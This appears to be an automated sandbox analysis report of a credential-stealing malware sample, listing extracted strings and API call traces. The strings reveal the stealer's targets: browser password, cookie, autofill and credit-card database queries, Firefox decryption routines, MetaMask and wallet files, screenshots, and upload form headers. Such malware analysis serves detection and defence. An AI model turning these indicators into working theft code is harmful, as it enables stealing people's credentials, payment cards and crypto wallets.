tqpzwpfbx, xrefs: 00405367
PK11SDR_Decrypt, xrefs: 00405E2C
logins.json, xrefs: 00405053
t9lthrm9u, xrefs: 00405290
MachineGuid, xrefs: 0040598B
GetObjectW, xrefs: 00405BAA
WTMR_1b5rxocf, xrefs: 00405E9D
ev_9cfo1p3l, xrefs: 00405F68
machineId=, xrefs: 004057D3
- Time zone: %c%ld minutes from GMT, xrefs: 00404D65
XML0vwx5qqa, xrefs: 00406030
tabqa92dv, xrefs: 004058B5
ldr_, xrefs: 004052E5
WTMR_4245xtfp, xrefs: 00405240
D%A, xrefs: 00406A15
SELECT fieldname, value FROM moz_formhistory, xrefs: 00405769
t*A, xrefs: 00406BC7
NSS_Init, xrefs: 00405D50
MTXy9bs4nx7, xrefs: 00406361
SelectObject, xrefs: 00405BDE
CreateCompatibleBitmap, xrefs: 00405B44
s_3y8eqp1f, xrefs: 0040631D
sqlite3_step, xrefs: 0040553E
SMPHR_iysbipi4, xrefs: 00404D5C
0+A, xrefs: 00406C32
WTMR_68zl9c6n, xrefs: 00404D9C
Content-Type: application/x-www-form-urlencoded; charset=utf-8, xrefs: 004051A8
s_chnzpjge, xrefs: 00404F0E
ev_83ghue7f, xrefs: 00405B76
ev_bvya3woa, xrefs: 00404CE9
*.lnk, xrefs: 00406522
regkj50vwml, xrefs: 00405750
vqbq3kvg, xrefs: 00405D88
WTMR_gxvpoqaz, xrefs: 00404FB1
ohpcw67a, xrefs: 004050A0
- Display Devices:%s, xrefs: 00404E69
PK11_Authenticate, xrefs: 00405DF6
qr8khxdr, xrefs: 004063F3
WTMR_zas83zwj, xrefs: 00405699
ppmrnxtn, xrefs: 00405034
gtks8w9w, xrefs: 00405A39
CreateCompatibleDC, xrefs: 00405B50
7mhzuiqy, xrefs: 00405C83
tw54zebwr, xrefs: 00405388
T"A, xrefs: 004068E8
regh037c70m, xrefs: 0040526B
Content-Type: multipart/form-data; boundary=, xrefs: 004051E0
+A, xrefs: 00406C72
t00dnerjm, xrefs: 00405F47
p8hh1gs2, xrefs: 004050D4
GdipSaveImageToFile, xrefs: 00405AF2
p'A, xrefs: 00406A7D
regthvs75y8, xrefs: 004063A4
v10, xrefs: 00405FC8
s_aor9vzq7, xrefs: 00406222
pd3ssdbv, xrefs: 00405EE2
u6m5ltiw, xrefs: 00405D83
ta3z71hy7, xrefs: 00406453
|'A, xrefs: 00406A8D
nss3.dll, xrefs: 004053A1
WTMR_efiowg0u, xrefs: 0040617E
,A, xrefs: 00406CF2
93s4eclk, xrefs: 0040571B
ynm9y2h9, xrefs: 00405DDB
WTMR_024nomth, xrefs: 00406488
h3srciic, xrefs: 00405A3E
WTMR_l82rdxkg, xrefs: 00405702
|%A, xrefs: 00406A20
WTMR_2lwdmtng, xrefs: 004052CB
BitBlt, xrefs: 00405B10
XMLdav1qxqb, xrefs: 00405C93
://, xrefs: 00405F5C
MTXukdk5rol, xrefs: 004054D6
ev_jddhpv9y, xrefs: 00406564
$%A, xrefs: 004069FF
SELECT name, value FROM autofill, xrefs: 004056B5
StretchBlt, xrefs: 00405C2C
sqlite3_finalize, xrefs: 00405589
regk6y32ko4, xrefs: 00405663
reg0l6t893i, xrefs: 00404BB1
open, xrefs: 00406551
s_eutb36gm, xrefs: 00405864
hostname":", xrefs: 00405E7A
th2xy09eh, xrefs: 0040517B
WTMR_nrrqvpp8, xrefs: 0040519F
regso4yxzed, xrefs: 00405797
MetaMask, xrefs: 0040615E
regfwav6hjm, xrefs: 00405BC3

Memory Dump Source

Source File: 00000003.00000002.2417723763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$Semaphore$TimerWaitable$Release$DebugEventOutputString$FileFind$Close$EnvironmentVariable$CancelOpen$Mutex$ErrorLastLocal$Mapping$AllocReset$First$Handle$ChangeNotification$Free$ByteCharMultiWide
String ID: %d) %s$%s %s$- Architecture: x%d$- CPU: %s (%d cores)$- Display Devices:%s$- Display size: %dx%d$- Locale: %s$- OS: %s$- RAM: %d MB$- Time zone: %c%ld minutes from GMT$ *A$","encryptedPassword":"$","guid":$","httpRealm":$"encrypted_key":"$"webextension@metamask.io":"$$%A$%sTRUE%s%s%s%s%s$&configId=$(#A$(,A$*.lnk$*/*$,%A$,)A$---$.dll$.sqlite$0+A$09eaw99e$288qh91m$3ctj9t2x$4yz9begi$5lg5ej3x$6okdm1tu$6pms62xl$7mhzuiqy$8"A$87039vfe$8ch0b0dd$93s4eclk$9r1zhjkf$://$<!A$<)A$ACCOUNT:%s|TOKEN:%s$BitBlt$Content-Disposition: form-data; name="file"; filename="$Content-Type: application/x-object$Content-Type: application/x-www-form-urlencoded; charset=utf-8$Content-Type: multipart/form-data; boundary=$Content-Type: text/plain;$Cookies$CreateCompatibleBitmap$CreateCompatibleDC$D%A$Default$DeleteObject$DisplayName$DisplayVersion$FALSE$GET$Gdi32.dll$GdiPlus.dll$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToFile$GdiplusStartup$GetObjectW$H*A$L'A$L(A$L)A$Local State$Login Data$Low$MTX1foxa753$MTX34s52bf3$MTX39bzbsag$MTX659bq5ml$MTXa8cu8u0k$MTXawf1ae1n$MTXdjgl1lda$MTXeuk0bqyk$MTXfk5pbuec$MTXj7l6ka3u$MTXq1n7w3bt$MTXqtzx8hp7$MTXrulvz4cj$MTXukdk5rol$MTXy9bs4nx7$MachineGuid$MetaMask$NSS_Init$NSS_Shutdown$NUM:%sHOLDER:%sEXP:%s/%s$Network\Cookies$P!A$P,A$PATH$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$POST$ProductName$Profile %d$Profiles$S-1-5-18$SECITEM_FreeItem$SELECT fieldname, value FROM moz_formhistory$SELECT host, path, isSecure, expiry, name, value FROM moz_cookies$SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies$SELECT name, value FROM autofill$SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT service, encrypted_token FROM token_service$SMPHR_5rwhgvw3$SMPHR_65h3azn8$SMPHR_7zytb0ri$SMPHR_8yh5ft3y$SMPHR_942zrjhx$SMPHR_ahhs9tdw$SMPHR_bbz60kxw$SMPHR_c6rtxn2e$SMPHR_d0ezvgky$SMPHR_hkoaqvuo$SMPHR_iysbipi4$SMPHR_jbdif3fc$SMPHR_jfnhvoos$SMPHR_jttod3t8$SMPHR_llytb8bk$SOFTWARE\Microsoft\Cryptography$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$SelectObject$SetStretchBltMode$Stable$StretchBlt$T"A$TRUE$URL:%sUSR:%sPASS:%s$User Data$WTMR_024nomth$WTMR_08qed3dz$WTMR_0n85vc3v$WTMR_1b5rxocf$WTMR_2lwdmtng$WTMR_2tpf3k9u$WTMR_3ulozhve$WTMR_4245xtfp$WTMR_68zl9c6n$WTMR_7eoqtgja$WTMR_8q2mlbb1$WTMR_9u1av0rn$WTMR_biq7qqp8$WTMR_bn76k1pi$WTMR_efiowg0u$WTMR_g0k9fdn1$WTMR_gxvpoqaz$WTMR_ijgum66z$WTMR_kzkrrc42$WTMR_l82rdxkg$WTMR_l9vi7zsm$WTMR_nrrqvpp8$WTMR_rnsjk8ck$WTMR_rv9lsjh5$WTMR_tes47dmi$WTMR_tkqhivt6$WTMR_upnz1jee$WTMR_yjyspzjz$WTMR_ywqblgmo$WTMR_zas83zwj$WTMR_zxk5sggz$Web Data$XML0vwx5qqa$XML796zf9ly$XMLayaqc7kz$XMLdav1qxqb$XMLdv4yvvx2$XMLea771d1v$XMLfg0ub50n$XMLit26gd8c$XMLlr84ct8q$XMLqrpms3fl$XMLrxdfmajw$XMLt0k88dpd$XMLu4fdevhq$XMLvl2yucl5$XMLx4yqw1al$XMLyeif1yte$XMLyoo3iq38$XMLz9za5ea8$\+A$\-A$\AccountTokens.txt$\CC.txt$\autofill.txt$\cookies.txt$\ffcookies.txt$\passwords.txt$ajncq7cv$ap1varzm$bilwyweo$c6nxfun9$c6qmvpwn$c82yqntn$cb2ooln2$cookies.sqlite$dscrd_$dwl78fay$encryptedUsername":"$ev_1yp16plg$ev_2yigbh0u$ev_4yh9mboq$ev_5k43o4b3$ev_83ghue7f$ev_9cfo1p3l$ev_bhdojfck$ev_bvya3woa$ev_h08jrwbj$ev_jddhpv9y$ev_mf0tns34$ev_mkv5p20y$ev_tc91xtzg$ev_tk2vs67b$ev_vo68bl08$evp5wksa$ews_$explorer.exe$extensions$formhistory.sqlite$fz8ld49v$gi25app2$gqnuu3oi$grbr_$gtks8w9w$h3srciic$hostname":"$hr1ql1ui$i32zb19a$iaat1l8d$image/jpeg$jneak3tj$jyawzxle$kq2xlkz9$krdqzy7f$l(A$ldop5nfk$ldr_$libs$logins.json$ly2md7as$m6wsuix9$machineId=$nser2o02$nss3.dll$ny8b8dyz$ohpcw67a$open$ouljkvyw$p$A$p'A$p6xpux7o$p8hh1gs2$pd3ssdbv$pera $ppmrnxtn$prefs.js$q61o789w$q7t7v6a8$qr8khxdr$qvmmqy34$reg0l6t893i$reg48zflry0$reg4t533bzq$reg77ah2op2$reg9vp9wahe$regbssywy3j$regcybb0am7$regec2n4lmn$regfaerruq6$regfwav6hjm$reggwktxg2i$regh037c70m$regh57c5y01$regiepztbw6$regiwldu3lh$regjj3pi0uk$regjwczwiv1$regk6y32ko4$regkj50vwml$regkukujc1n$regnmhit5i7$regnw0xpzk8$regon8lhjmk$regpnezg2ar$regso4yxzed$regthvs75y8$ro27ovri$s_0rhtpalp$s_34kdzx3i$s_3y8eqp1f$s_aor9vzq7$s_b2q4tb82$s_bcfre8zh$s_chnzpjge$s_eutb36gm$s_fh9hh7uu$s_lbbp44mn$s_nxlib5zf$s_zlpk6fi9$scrnsht_$sgnl_$sqlite3.dll$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes16$sqlite3_column_text16$sqlite3_finalize$sqlite3_open16$sqlite3_prepare_v2$sqlite3_step$srjxnyfw$sstmnfo_$stats_version":"$storage\default$t)A$t*A$t00dnerjm$t0yhzp32e$t177nyisu$t1f98jrxw$t374uhtn$t60xwhd9g$t811wbm0h$t8mzisows$t8x0ufnff$t9lthrm9u$ta3z71hy7$tabqa92dv$tb5ozaklm$tci9y5j5y$tgnaptnne$tgwabdohg$th2xy09eh$tht6hiwda$ti9nukpkj$tiklkzfzv$tixn00umv$tk49ljafb$tkcq1j60r$tl1wdo764$tlgrm_$tlsubx3d4$tm7gm98q4$tntjlvy28$token:$tov5q26c7$tp9vj0b43$tqmqpycwx$tqpd21biq$tqpzwpfbx$trirngqb4$trxhpga6b$tspltdjl$tsv0hbria$tvkat4fjq$tw54zebwr$tw931ljur$txko6u6fs$txmwu9rge$ty46st8d5$tz5kl8u5q$tzsphikyt$tzuizwazx$u6m5ltiw$v10$vgko7r23$vq8nojgl$vqbq3kvg$wallet.dat$wallets$wlts_$xjzuu3oe$xtntns_$y0t5yda9$ynm9y2h9$z8zbvgpl$|"A$|#A$|%A$|'A$|-A$#A$+A$,A
API String ID: 1070074762-329154
Opcode ID: 41deb5c26e9e69cb7efd74576d889c36931fec03bca5f2c375b178b6982c1c58
Instruction ID: 5e740a273b51b3ffba0b4ed496176ddaae92a82a5524f114896138874b80e7b8
Opcode Fuzzy Hash: 41deb5c26e9e69cb7efd74576d889c36931fec03bca5f2c375b178b6982c1c58
Instruction Fuzzy Hash: 13034C75A40754EBD710ABA1AD49FDA3F65EB88785F10803AF701AA1F0DBF854D08B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409ADC Relevance: 892.3, APIs: 320, Strings: 189, Instructions: 1575timeregistrymemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,000009EA), ref: 00409AF3
LocalFree.KERNEL32(00000000), ref: 00409AFA
OutputDebugStringA.KERNEL32(tw0xu14w8), ref: 00409B0B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLb8uaoddh), ref: 00409B16
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409B20
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_adwimds2), ref: 00409B34
CancelWaitableTimer.KERNEL32(00000000), ref: 00409B3B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t9m6egtl), ref: 00409B49
SetEnvironmentVariableA.KERNEL32(xs5vk1s3,yiiah0mu), ref: 00409B5D
CancelWaitableTimer.KERNEL32(00000000), ref: 00409B60
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_ryx02sq6), ref: 00409B71
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409B7B
CoInitialize.OLE32(00000000), ref: 00409B82
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000D46,00000000), ref: 00409B94
SetEnvironmentVariableA.KERNEL32(ge955tme,xzk43o9r), ref: 00409BA6
FindCloseChangeNotification.KERNEL32(00000000), ref: 00409BA9
SetEnvironmentVariableA.KERNEL32(d4cmirb6,f1tx9ijh), ref: 00409BB9
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLjlel85wp), ref: 00409BC6
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409BD0
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_dyzpca0g), ref: 00409BE4
CancelWaitableTimer.KERNEL32(00000000), ref: 00409BE7
RegOpenKeyExA.KERNEL32(80000001,regl9ou77sk,00000000,00020019,?), ref: 00409C02
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_v69s0jur), ref: 00409C10
CancelWaitableTimer.KERNEL32(00000000), ref: 00409C17
GetLastError.KERNEL32 ref: 00409C1F
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_e2jplyy5), ref: 00409C2E
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409C38
OutputDebugStringA.KERNEL32(tygxt7169), ref: 00409C4E
LocalAlloc.KERNEL32(00000000,00000D79), ref: 00409C5B
LocalFree.KERNEL32(00000000), ref: 00409C62
OutputDebugStringA.KERNEL32(tv8nwi2ye), ref: 00409C70
CreateWaitableTimerA.KERNEL32(00000009,00000001,WTMR_2txq3mdt), ref: 00409C7F
OutputDebugStringA.KERNEL32(ty1p0rbxh), ref: 00409C8A
CancelWaitableTimer.KERNEL32(?), ref: 00409C9B
CreateMutexA.KERNEL32(00000000,00000000,MTXpzc2har6), ref: 00409CAA
SetEnvironmentVariableA.KERNEL32(omc9fsdv,ft98khpd), ref: 00409CC2
ReleaseMutex.KERNEL32(?), ref: 00409CC8
OutputDebugStringA.KERNEL32(tp32whtjp), ref: 00409CD5

Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLf3sp4yo9), ref: 00409CE2
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409CED
SetEnvironmentVariableA.KERNEL32(1yqp8rgm,qjqhz0u1), ref: 00409CFD
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_2eq14qd1), ref: 00409D0A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409D15
OutputDebugStringA.KERNEL32(tamx0g12y), ref: 00409D24
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_vyhzltt5), ref: 00409D2F
ExitProcess.KERNEL32 ref: 00409D3B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tr76xwe3), ref: 00409D58
CancelWaitableTimer.KERNEL32(00000000), ref: 00409D5B
SetEnvironmentVariableA.KERNEL32(f5p68xvg,llliohkc), ref: 00409D6B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_6lpzdlwo), ref: 00409D78
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409D83
OutputDebugStringA.KERNEL32(tjetkpjp5), ref: 00409D99
FindFirstFileA.KERNEL32(s_2ubk6zki,?), ref: 00409DA5
FindClose.KERNEL32(00000000), ref: 00409DAC
LocalAlloc.KERNEL32(00000000,00000B49), ref: 00409DB9
LocalFree.KERNEL32(00000000), ref: 00409DC0
GetLastError.KERNEL32 ref: 00409DC6
SetEnvironmentVariableA.KERNEL32(002oxa6s,lsdlhn77), ref: 00409DD9
CreateWaitableTimerA.KERNEL32(00000001,00000001,WTMR_vxf9syn6), ref: 00409DE8
GetLastError.KERNEL32 ref: 00409DF4
CancelWaitableTimer.KERNEL32(?), ref: 00409E05
CreateMutexA.KERNEL32(00000000,00000000,MTXs7yc2cpf), ref: 00409E27
ReleaseMutex.KERNEL32(00000000), ref: 00409E32
SetEnvironmentVariableA.KERNEL32(uy3n4usz,9kcjkxl4), ref: 00409E42
GetLastError.KERNEL32 ref: 00409E46
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_mo34bm41), ref: 00409E53
SetEvent.KERNEL32(00000000), ref: 00409E5C
ResetEvent.KERNEL32(00000000), ref: 00409E63
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLnusjnsj4), ref: 00409E74
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409E7E
RegOpenKeyExA.ADVAPI32(80000001,regxdm8zho5,00000000,00020019,?), ref: 00409E99
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000BA0,00000000), ref: 00409EAB
SetEnvironmentVariableA.KERNEL32(161wgn8y,p1bpvb3k), ref: 00409EBD
FindCloseChangeNotification.KERNEL32(00000000), ref: 00409EC0
SetEnvironmentVariableA.KERNEL32(e0qagkaq,f35cv2jv), ref: 00409ED0
LocalAlloc.KERNEL32(00000000,0000080A), ref: 00409ED9
LocalFree.KERNEL32(00000000), ref: 00409EE0
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_sj1xw7ld), ref: 00409EF5
OutputDebugStringA.KERNEL32(tlvo7moy8), ref: 00409F00
CancelWaitableTimer.KERNEL32(?), ref: 00409F0B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_cjcjokyw), ref: 00409F1A
CancelWaitableTimer.KERNEL32(00000000), ref: 00409F1D
RegOpenKeyExA.ADVAPI32(80000001,regihm21o6p,00000000,00020019,?), ref: 00409F39
LocalAlloc.KERNEL32(00000000), ref: 00409F57
SetEnvironmentVariableA.KERNEL32(ku9syi5h,c5wa0nkd), ref: 00409F69
LocalFree.KERNEL32(00000000), ref: 00409F6C
SetEnvironmentVariableA.KERNEL32(p44tx6zp,eazbdckw), ref: 00409F7C
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_90d3uvs3), ref: 00409F88
CancelWaitableTimer.KERNEL32(00000000), ref: 00409F93
SetEnvironmentVariableA.KERNEL32(9as963us,27tkawec), ref: 00409FA5
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000AAB,00000000), ref: 00409FB3
GetLastError.KERNEL32 ref: 00409FBB
FindCloseChangeNotification.KERNEL32(00000000), ref: 00409FC2
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0vfjvhca), ref: 00409FD9
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00409FE0
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_p0n3nl7z), ref: 00409FEF
CancelWaitableTimer.KERNEL32(00000000), ref: 00409FF6
RegOpenKeyExA.ADVAPI32(80000001,regpf00k4ni,00000000,00020019,?), ref: 0040A012
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_y57u78i2), ref: 0040A023
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A02A
RegOpenKeyExA.ADVAPI32(80000001,regln1bdbu9,00000000,00020019,?), ref: 0040A04A
OutputDebugStringA.KERNEL32(tqeqy21fj), ref: 0040A057
FindFirstFileA.KERNEL32(s_prfrvct4,?), ref: 0040A076
FindClose.KERNEL32(00000000), ref: 0040A07D
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_uop44cey), ref: 0040A08E
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A095
SetEnvironmentVariableA.KERNEL32(3ea1jj2a,q3etk14f), ref: 0040A0A9
OutputDebugStringA.KERNEL32(tcbeioeps), ref: 0040A0B2
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLxkunipu6), ref: 0040A0BF
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A0C7
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_4y0ori58), ref: 0040A0D6
SetEvent.KERNEL32(00000000), ref: 0040A0DF
ResetEvent.KERNEL32(00000000), ref: 0040A0E6
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_obehzf3u), ref: 0040A0FB
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A0FE
OutputDebugStringA.KERNEL32(tiwnylch0), ref: 0040A109
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000001EE,00000000), ref: 0040A119
CloseHandle.KERNEL32(00000000), ref: 0040A120
CreateMutexA.KERNEL32(00000000,00000000,MTX4z00y3dg), ref: 0040A12F
ReleaseMutex.KERNEL32(00000000), ref: 0040A13A
RegOpenKeyExA.ADVAPI32(80000001,regvftu6lz0,00000000,00020019,?), ref: 0040A158
GetLastError.KERNEL32 ref: 0040A15E
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000011BD,00000000), ref: 0040A182
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A189
OutputDebugStringA.KERNEL32(teqpwudeb), ref: 0040A194
CreateMutexA.KERNEL32(00000000,00000000,MTXdhtqvkw3), ref: 0040A19F
ReleaseMutex.KERNEL32(00000000), ref: 0040A1AA
LocalAlloc.KERNEL32(00000000,00000A31), ref: 0040A1B7
LocalFree.KERNEL32(00000000), ref: 0040A1BE
RegOpenKeyExA.ADVAPI32(80000001,regaq0b5t8d,00000000,00020019,?), ref: 0040A1DA
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_oub7h52a), ref: 0040A1E9
SetEnvironmentVariableA.KERNEL32(j9t3a45b,5d227bfk), ref: 0040A1F7
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A1FA
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML71cmvfhb), ref: 0040A211
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A218
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_vlpohx8g), ref: 0040A229
SetEnvironmentVariableA.KERNEL32(braglban,kb6fjaib), ref: 0040A237
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A23E
RegOpenKeyExA.ADVAPI32(80000001,regtg6hgy4i,00000000,00020019,?), ref: 0040A25E
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gl9rlb32), ref: 0040A26F
SetEvent.KERNEL32(00000000), ref: 0040A278
ResetEvent.KERNEL32(00000000), ref: 0040A27F
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mj0fpgou), ref: 0040A28F
CreateEventA.KERNEL32(00000000,00000001,00000000), ref: 0040A2AF
SetEvent.KERNEL32(00000000), ref: 0040A2B8
ResetEvent.KERNEL32(00000000), ref: 0040A2BF
LocalAlloc.KERNEL32(00000000,00000039), ref: 0040A2C9
OutputDebugStringA.KERNEL32(toy33ol74), ref: 0040A2D6
LocalFree.KERNEL32(00000000), ref: 0040A2D9
OutputDebugStringA.KERNEL32(tdsc9rk0q), ref: 0040A2E4
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,0000028F,00000000), ref: 0040A2F4
OutputDebugStringA.KERNEL32(tcgrgqimv), ref: 0040A301
FindCloseChangeNotification.KERNEL32(00000000), ref: 0040A304
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_g6taiqrz), ref: 0040A315
SetEnvironmentVariableA.KERNEL32(g85kbixa,7gl86t31), ref: 0040A327
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A32E
GetLastError.KERNEL32 ref: 0040A338
FindFirstFileA.KERNEL32(s_si61chqu,?), ref: 0040A34B
FindClose.KERNEL32(00000000), ref: 0040A352
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_a48a899t), ref: 0040A367
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A36E
OutputDebugStringA.KERNEL32(t4xm2me3a), ref: 0040A37B
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_pto6pfv2), ref: 0040A386
SetEnvironmentVariableA.KERNEL32(51v3k8q2,ohdt31xv), ref: 0040A394
CancelWaitableTimer.KERNEL32(00000000), ref: 0040A39D
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML3n3278d8), ref: 0040A3B0
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A3B7

Part of subcall function 0040DC49: RegOpenKeyExA.ADVAPI32(80000001,regduvy6vjh,00000000,00020019,?,771A9350,771A7CD0,771C4B60), ref: 0040DC6C
Part of subcall function 0040DC49: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_iel5vn6f), ref: 0040DC7B
Part of subcall function 0040DC49: GetLastError.KERNEL32 ref: 0040DC89
Part of subcall function 0040DC49: CancelWaitableTimer.KERNEL32(00000000), ref: 0040DC8C
Part of subcall function 0040DC49: FindFirstFileA.KERNEL32(s_4o4wkk8x,?), ref: 0040DC9E
Part of subcall function 0040DC49: FindClose.KERNEL32(00000000), ref: 0040DCA5
Part of subcall function 0040DC49: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0ps9kk75), ref: 0040DCB6
Part of subcall function 0040DC49: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCC1
Part of subcall function 0040DC49: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_co8m4cgj), ref: 0040DCD2
Part of subcall function 0040DC49: SetEvent.KERNEL32(00000000), ref: 0040DCDB
Part of subcall function 0040DC49: ResetEvent.KERNEL32(00000000), ref: 0040DCE2
Part of subcall function 0040DC49: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_yqgz522c), ref: 0040DCF3
Part of subcall function 0040DC49: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040DCFE
Part of subcall function 0040DC49: GetLastError.KERNEL32 ref: 0040DD08
Part of subcall function 0040DC49: CreateMutexA.KERNEL32(00000000,00000000,MTXphqqzlgp), ref: 0040DD13
Part of subcall function 0040DC49: OutputDebugStringA.KERNEL32(ttljfcwbf), ref: 0040DD24
Part of subcall function 0040DC49: ReleaseMutex.KERNEL32(00000000), ref: 0040DD2B
Part of subcall function 0040DC49: SetEnvironmentVariableA.KERNEL32(8b5m7j2t,j365hmj6), ref: 0040DD3B
Part of subcall function 0040DC49: lstrlenA.KERNEL32(d1fc95c6179be4b0b4f93eff6ab3f08f), ref: 0040DD84

CreateSemaphoreA.KERNEL32(00000000,00000000,00000001), ref: 0040A3D9
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A3E0
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_sppgcywv), ref: 0040A3F1
OutputDebugStringA.KERNEL32(txa3akxyw), ref: 0040A3FA
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040A402
GetLastError.KERNEL32 ref: 0040A40C
RegOpenKeyExA.ADVAPI32(80000001,reg130n27js,00000000,00020019,?), ref: 0040A429
